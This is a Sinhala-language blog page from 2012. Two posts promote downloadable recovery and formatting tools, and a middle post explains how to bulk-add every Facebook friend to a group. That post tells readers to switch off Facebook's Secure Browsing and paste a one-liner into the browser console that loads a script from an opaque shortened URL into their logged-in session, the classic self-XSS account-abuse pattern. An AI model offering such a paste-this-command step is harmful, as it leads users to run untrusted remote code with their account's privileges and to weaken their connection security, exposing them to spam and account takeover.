                   කස්ටියට කොහොමැයි ආ... ඔන්න මම අදත් පොඩි ගැජමැටික්ස් සෙෆ්ට්වෙයාර් කෑල්ලක් ගෙනාව. ඔයාල පරිගණකයේ වැඩ කරනකොට ඔයාලට වැදගත් දෙයක් ඩිලීට් උනොත් මොකද කරන්නේ.( වෙන්ට වයිෆ්ගේ ෆොටෝ එකක් එහෙම මැකුනොත්) මොන දෙයියට කියන්නද නේ. හරි අන්න එහෙම දෙයක් මැකුනොත් කියන්න ඉන්න දෙවි කෙනෙක් තමයි දෙනන් යන්නේ. ඇත්තටම කිවුවොත් මේක රිකවරි සොෆ්ට්වෙයාර් කෑල්ලක්. මෙකෙන් වැඩ කරන්න හරිම ලේසියි. මමත් මේක තමයි දාගෙන ඉන්නේග එහෙනම් පහල්ලෙහා සිහිනයට ගිහින් දෙවියන්ව වඩම්මවා ගන්න. මේක කියවල නිකම්ම යන්න එපා පල්ලෙහා තියන කමෙන්ට් කියන් තැන මේ දෙවියන් ගැන මොනව හරි යලම යන්න. එහෙනම් මං ගියා ඕං...

සිහිනයට පිවිසෙන්න


Sunday, September 16, 2012

facebook group එකට ගෙඩිය පිටින් කස්ටිය බස්සමු

                     


                        ඉතින් යාළුවනේ මම ඔන්න අද දවසට දෙන දෙවැනි ලිපිය. මට මගේ හොදම යාළුවෙක් (යාළුවෙක් කිවුවට මාළුවෙක් වගේ) කිවුව එයාගේ group එකට කස්ටිය ටිකක් දාල දෙන්න කියල. එයාගේ group එක කිවුවට ඒක අපේ වගේ. ඉතින් යාළුවගේ නමත් කියන්නම්කෝ. නමින් අමිල මට ඇහිල තියනව සමහරැ -තෙලා- කියනව. ආදරේට වෙන්න ඇති. හරි ඉතින් කොහොම හරි දැන් මට කිවුවනේ කස්ටියව එකතු කරන්න කියල. කියපු හින්ද කරන්නත් ඕනනේ.එක එක බුවාල තෝර තෝර add කරන්න ගියාම එපා වෙනව නේ. ඉතින් මන් පොඩි ජිල්මාට් වැඩක් කරල මගේ facebook profile එකේ හිටපු කස්ටිය ඔක්කොම ගෙඩිය පිටින්ම group එකට බැස්සුවා. වැ‍ඩේ නම් එල කිරි වගේ. අනේ මට ඉතින් අපේ group එක මොකද්ද කියල කියන්න බැරි උනානේ.ITnow (Any IT point, Share With ITnow) ඔන්න ඔය නම තමයි අපේ group එක.

හරි දැන් අපි වැඩේ කරන්නේ කොහොමද කියල බලමුකෝ.

                            මුලින්ම ෆේස්බුක් ගිණුමෙ Secure Browsing OFF කරන්න ඕන. ඒක කරන විදිය දන්නේ නෑ වගේනම් ඔය දීල තියන විදියට කරන්නකෝ Facebook Account Settings >> Security Settings >> Secure Browsing එක disable කරලා Save කරන්න.වැඩේ හරිද? ඔන්න මේකෙනුත් බලා ගන්නකෝ.



                    දැන් ඉතින් ඔන්න ඒ වැඩෙත් හරි. මං අහල තියනවා එක එක කෙහෙල් ගෙඩි වලට එක එක .............. එවා කියලා. ඇය හිනාවෙන්නේ. අන්න ඒ වගේ ඔයාල පාවිච්චි කරන Brows වලට වෙන වෙනම මේ වැඩේ කරන්න ඕන. හරිනේ එහෙනම්.


  • මුලින්ම google chrome සදහා.
*  මුලින්ම ඔයාලට ඕන group එක තෝර ගන්න. 
*  Page එක කොහෙ හරි Right Click කරල "Inspect Element" අරගන්න. එහි අවසානයට ඇති  "Console"   තෝරන්න. මේ වැඩේ තේරැනේ නැති අය කෙලින්ම "F12" ඔබන්න. ආ දැන් හරිනේ.
*  ඊට පස්සේ  "Console"  එක මගින් open වු බාර් එකේ right click කරල clear Console දෙන්න.
*  අන්තිමේට මෙන්න මේ ටික copy කරල past කරල enter කරන්න .

document.body.appendChild(document.createElement('script')).src='http://goo.gl/aQwsk';

  • Mozilla Firefox සදහා.
*  මුලින්ම ඔයාලට ඕන group එක තෝර ගන්න. 
*  CTRL + SHIFT + K යතුරු එකවර තදකරන්න.
*  අන්තිමේට මෙන්න මේ ටික copy කරල past කරල enter කරන්න .

document.body.appendChild(document.createElement('script')).src='http://goo.gl/aQwsk';

            දැන් වැඩ ටික ඔක්කොම හරි.   බලන් ඉද්දි කස්ටිය group එකට පෝලිමේ එනව. ඉතින් මේ ගැන මොනව හරි කියලම යන්න.

           ආ.... ඔයාල මේක කරලම බලන්න. මට කරන පොඩි උදව්වක් විදියට මේ group එකට කස්ටිය ටිකක් දාල දෙන්න. මෙන්න group එක.



Format වෙන්නෙ නැති pen, sd card ලේසියෙන්ම format කරමු.



                                     කොහොමද කස්ටියට. ගුඩ් මෝර්නින් කිවුවා. ඉතින් ඔන්න මම අදත් ආව ඔයාලට ගොඩක් වැදගත් දෙයක්  අරගෙන.මම අහල තියනවා ඔයාලගේ සමහර පෙන් ෆෝන් චිප් ෆෝමැට් කරන්න බෑ කියල. ඔයා ලගත් තියනවද? ඔන්න ඉතින් ඒ විදියට ෆෝමැට් කරන්න බැරි දේවල් ලේසියෙන්ම ෆෝමැට් කරල දෙන පොඩි සොෆ්ට්වෙයාර් කෑල්ලක් තමයි දෙන්න යන්නෙ. වැඩේ නම් හොදයි නේද? කරලම බලන්නකෝ කොහොමද කියල. වැඩේ ගොඩ වගේනම් මොනවහරි අදහසක් දාලම යන්න.පහල සිහිනයෙන් සොෆ්ට්වෙයාර් එක බාගන්න.

සිහිනයට පිවිසෙන්න